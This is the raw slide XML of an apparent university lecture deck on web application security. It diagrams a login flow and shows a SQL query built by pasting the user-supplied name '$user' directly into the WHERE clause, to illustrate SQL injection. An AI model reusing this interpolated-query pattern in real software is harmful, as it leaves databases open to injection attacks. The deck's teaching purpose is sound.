Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink35.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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37.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69.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink44.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.jpeg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink41.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink43.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink45.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink38.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink40.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://found.apple.com/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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customXml" Target="../ink/ink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customXml" Target="../ink/ink47.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5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7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69.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.emf"/><Relationship Id="rId9"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51.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image740.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId2"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50.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image750.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink49.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image770.png"/></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4.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink15.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6.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18D8845F-30A4-4D73-83CB-ABA691F5A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39" name="Rectangle 138">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1C81EC1-E2C4-BE41-B86A-1C257788F68F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1241170" y="3755360"/>
            <a:ext cx="9732773" cy="2010522"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>WEB APPLICATION SECURITY</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Vitaly Shmatikov</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Rectangle 140">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3" name="Straight Connector 142">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098" name="Picture 2" descr="bobby-tables.com: A guide to preventing SQL injection">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C9D753D-6674-9A45-878E-4E639383C4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96889" y="1395172"/>
            <a:ext cx="7208805" cy="221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89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8444505-97B1-2545-814F-38C32E038F1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Typical Login Prompt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41987" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C34C7972-6D2B-6A49-9470-249A3B8EE70B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-3807" r="-13399"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2014194"/>
            <a:ext cx="10058400"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFBFC6E2-C49F-4546-8B02-FA65BAD30289}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3507475" y="3818534"/>
            <a:ext cx="877163" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>smith</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBDB10B4-7D5C-F541-B14A-47AF2DB39D4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3507474" y="4471271"/>
            <a:ext cx="1435008"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22708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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4F7DE59-ECEE-8649-BA27-90D42FBA664D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3824790" y="2286001"/>
            <a:ext cx="13404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Enter </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Username </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43012" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C9D8704-DBD8-C348-BD8D-3AF67328429E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="50927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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43013" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0C80A92-36BB-8441-A5EC-2FB7A558E764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438401" y="2444750"/>
            <a:ext cx="139541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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(Client)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43014" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A36B90DB-0030-7542-9303-70426E3465CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="85979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DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43015" name="Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AD25DED-97E5-F04C-84E9-D632C8EFF4F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3814764" y="3886200"/>
            <a:ext cx="1298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6" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB228F5F-A810-294E-894B-473DCAC033E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3848100" y="4418013"/>
            <a:ext cx="1181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7" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4956A1BB-C2D2-5746-B1F7-DCD77E953DDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6565263" y="2286001"/>
            <a:ext cx="19046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SELECT passwd </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>FROM USERS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>WHERE uname </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>IS ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF3399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>$user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43018" name="Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83A0CEDF-965C-B345-BAFF-FFC0EB0D267D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6372226" y="3886200"/>
            <a:ext cx="22129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9" name="Line 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08CD4CBA-FA94-B04A-B8B2-4A9EC2E0D052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6405563" y="4381500"/>
            <a:ext cx="21193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 name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{759859C2-F14A-5F49-B563-DB86AEE7E6DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Inputs Becomes Part of Query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110262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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4F7DE59-ECEE-8649-BA27-90D42FBA664D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3824790" y="2286001"/>
            <a:ext cx="13404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Enter </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Username </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43012" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C9D8704-DBD8-C348-BD8D-3AF67328429E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="50927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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43013" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0C80A92-36BB-8441-A5EC-2FB7A558E764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438401" y="2444750"/>
            <a:ext cx="139541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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(Client)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43014" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A36B90DB-0030-7542-9303-70426E3465CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="85979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DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43015" name="Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AD25DED-97E5-F04C-84E9-D632C8EFF4F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3814764" y="3886200"/>
            <a:ext cx="1298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6" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB228F5F-A810-294E-894B-473DCAC033E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3848100" y="4418013"/>
            <a:ext cx="1181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7" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4956A1BB-C2D2-5746-B1F7-DCD77E953DDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6565263" y="2286001"/>
            <a:ext cx="19046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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SELECT passwd </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>FROM USERS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>IS ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>smith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43018" name="Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83A0CEDF-965C-B345-BAFF-FFC0EB0D267D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6372226" y="3886200"/>
            <a:ext cx="22129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19" name="Line 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08CD4CBA-FA94-B04A-B8B2-4A9EC2E0D052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6405563" y="4381500"/>
            <a:ext cx="21193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 name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{759859C2-F14A-5F49-B563-DB86AEE7E6DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
